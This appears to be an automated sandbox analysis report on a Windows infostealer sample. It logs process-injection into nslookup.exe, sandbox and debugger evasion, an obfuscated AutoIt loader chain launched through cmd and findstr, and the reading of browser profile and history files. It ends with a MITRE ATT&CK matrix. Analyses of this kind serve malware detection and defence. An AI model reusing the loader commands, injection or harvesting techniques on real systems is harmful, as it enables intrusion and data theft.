Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0023FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\Desktop\WDnE51mua6.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleepShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\Desktop\WDnE51mua6.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_3_04646816 sldt word ptr [eax+00000000h]
Source: C:\Windows\SysWOW64\nslookup.exeThread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\nslookup.exeThread delayed: delay time: 300000
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 551
Source: C:\Windows\System32\conhost.exe TID: 4272Thread sleep count: 551 > 30
Source: C:\Windows\SysWOW64\nslookup.exe TID: 7084Thread sleep count: 73 > 30
Source: C:\Windows\SysWOW64\nslookup.exe TID: 7084Thread sleep time: -21900000s >= -30000s
Source: C:\Windows\SysWOW64\nslookup.exe TID: 7084Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\nslookup.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\nslookup.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_0091E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0029A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002965AE FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0025C6C2 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00297205 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002972A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00299E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00299F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008B29A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
Source: C:\Windows\SysWOW64\nslookup.exeThread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\nslookup.exeThread delayed: delay time: 300000
Source: Gia.exe.com, 00000006.00000003.373817469.0000000003A0F000.00000004.00000001.sdmpBinary or memory string: VSBQTQCGHGFSVBZNPa
Source: Gia.exe.com, 00000007.00000003.481222837.0000000000C86000.00000004.00000001.sdmpBinary or memory string: For $XiNdoKGhHHMCONMOTWHGfSTeNgLuudMzhkzCOkswjyqkIf = 14 To 21iHv
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Gia.exe.com, 00000006.00000003.379643001.00000000014A1000.00000004.00000001.sdmp, Gia.exe.com, 00000007.00000003.500853897.0000000001015000.00000004.00000001.sdmpBinary or memory string: XINDOKGHHHMCONMOTWHGFSTENGLUUDMZHKZCOKSWJYQKIF
Source: Gia.exe.com, 00000006.00000003.363693331.0000000001246000.00000004.00000001.sdmpBinary or memory string: Local $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("108$94$113$95$116$92$108$80$122$95$72$111$72$127$80$120$83$92$116$80$124$110$124$126$74$120",5)bpP'V
Source: Gia.exe.com, 00000006.00000003.363693331.0000000001246000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.517559340.0000000001815000.00000004.00000001.sdmp, D.4.drBinary or memory string: $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("74$118$85$93$119$111$103$125$93$120$113$69$110$114$80$80$85$74$112$115$120$76$106$102$115",4)
Source: Gia.exe.com, 00000007.00000003.484283807.0000000000E1B000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.512752448.0000000001735000.00000004.00000001.sdmp, D.4.drBinary or memory string: Local $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("108$94$113$95$116$92$108$80$122$95$72$111$72$127$80$120$83$92$116$80$124$110$124$126$74$120",5)
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: Gia.exe.com, 00000006.00000003.363693331.0000000001246000.00000004.00000001.sdmp, Gia.exe.com, 00000007.00000003.485762857.0000000000DEE000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.517346905.00000000017B0000.00000004.00000001.sdmp, D.4.drBinary or memory string: Local $OAqRAdBbLENaGz = Execute(WFzUldrKAarEmh("83$116$114$105$110$103$73$115$70$108$111$97$116$40$39$99$88$111$72$89$77$97$80$97$39$41",0)), $rmmUODWAgzS = 'WnhgFsHZLPgRZzChkPpMgNPUzgtiphUTx'
Source: juROhmfLml.exe.com, 0000000C.00000003.525890863.0000000003A7D000.00000004.00000001.sdmpBinary or memory string: AYMJRBYKOZPULCBEXEFVMCIRPJNVHKMNQLYPKHLNORGCWOLBBRWSHWLTBV
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: juROhmfLml.exe.com, 0000000C.00000003.526715313.00000000019DF000.00000004.00000001.sdmpBinary or memory string: XINDOKGHHHMCONMOTWHGFSTENGLUUDMZHKZCOKSWJYQKIFzY6
Source: juROhmfLml.exe.com, 0000000C.00000003.521769343.0000000003EAD000.00000004.00000001.sdmpBinary or memory string: VSBQTQCGHGFSVBZNP=
Source: Gia.exe.com, 00000007.00000003.497896623.000000000333D000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.523133517.0000000003D3B000.00000004.00000001.sdmpBinary or memory string: WnhgFsHZLPgRZzChkPpMgNPUzgtiphUTx
Source: Gia.exe.com, 00000007.00000003.491094566.0000000003773000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000002.530969482.00000000041DF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Gia.exe.com, 00000007.00000003.479485061.0000000000C89000.00000004.00000001.sdmpBinary or memory string: For $AyMjRBYKozpULCBeXeFVMcIRpJnVhKmNQLypkhlNOrGCWOLBbRWsHwltbV = 2 To 35'~O
Source: Gia.exe.com, 00000007.00000003.361970252.0000000003812000.00000004.00000001.sdmp, D.4.drBinary or memory string: For $XiNdoKGhHHMCONMOTWHGfSTeNgLuudMzhkzCOkswjyqkIf = 14 To 21
Source: nslookup.exe, 00000010.00000002.591747509.0000000003B37000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8O
Source: Gia.exe.com, 00000006.00000003.375300453.00000000038A4000.00000004.00000001.sdmpBinary or memory string: WnhgFsHZLPgRZzChkPpMgNPUzgtiphUTx;
Source: D.4.drBinary or memory string: For $AyMjRBYKozpULCBeXeFVMcIRpJnVhKmNQLypkhlNOrGCWOLBbRWsHwltbV = 2 To 35
Source: Gia.exe.com, 00000007.00000003.488239080.0000000000E52000.00000004.00000001.sdmpBinary or memory string: $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("74$118$85$93$119$111$103$125$93$120$113$69$110$114$80$80$85$74$112$115$120$76$106$102$115",4)W
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Gia.exe.com, 00000007.00000003.495710670.00000000034B7000.00000004.00000001.sdmpBinary or memory string: VSBQTQCGHGFSVBZNPG
Source: Gia.exe.com, 00000006.00000003.373817469.0000000003A0F000.00000004.00000001.sdmp, Gia.exe.com, 00000007.00000003.495710670.00000000034B7000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.521769343.0000000003EAD000.00000004.00000001.sdmpBinary or memory string: VSBQTQCGHGFSVBZNP
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0029F2E8 BlockInput,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008B331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00407E2D LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008D5108 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00245108 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028207D GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008D1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008E29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00240DF5 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002529B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00240C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00241041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comMemory written: C:\Windows\SysWOW64\nslookup.exe base: 2C60000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comMemory written: C:\Windows\SysWOW64\nslookup.exe base: 2800000 value starts with: 4D5A
Writes to foreign memory regionsShow sources
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comMemory written: C:\Windows\SysWOW64\nslookup.exe base: 2C60000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comMemory written: C:\Windows\SysWOW64\nslookup.exe base: 2800000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comMemory written: C:\Windows\SysWOW64\nslookup.exe base: 27F2000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00281A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008B331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008CFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028EB2C mouse_event,
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Windows\System32\svchost.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe CmD
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Gia.exe.com D
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process get Name
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\makecab.exe makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002813DC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00403F0A AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
Source: Gia.exe.com, 00000006.00000000.354662827.0000000000973000.00000002.00020000.sdmp, Gia.exe.com, 00000007.00000002.502815629.0000000000973000.00000002.00020000.sdmp, juROhmfLml.exe.com, 0000000C.00000002.529054024.00000000002E3000.00000002.00020000.sdmp, Gia.exe.com.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Gia.exe.com, juROhmfLml.exe.com, nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
Source: nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00240AB8 cpuid
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,
Source: C:\Windows\SysWOW64\nslookup.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrB32.tmp VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrCF8.tmp VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chr1073.tmp VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49 VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chr2302.tmp VolumeInformation
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_004028F2 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??3@YAXPAX@Z,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0025BD72 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00406024 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,lstrlenW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\DefaultAccount\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\WDAGUtilityAccount\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\Guest\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002A204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002A1A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation11Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScripting1Valid Accounts2Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11Input Capture131File and Directory Discovery2Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsNative API1Registry Run Keys / Startup Folder2Valid Accounts2Scripting1Security Account ManagerSystem Information Discovery37SMB/Windows Admin SharesInput Capture131Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Access Token Manipulation21Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptProcess Injection212Masquerading11LSA SecretsSecurity Software Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder2Valid Accounts2Cached Domain CredentialsVirtualization/Sandbox Evasion41VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion41DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
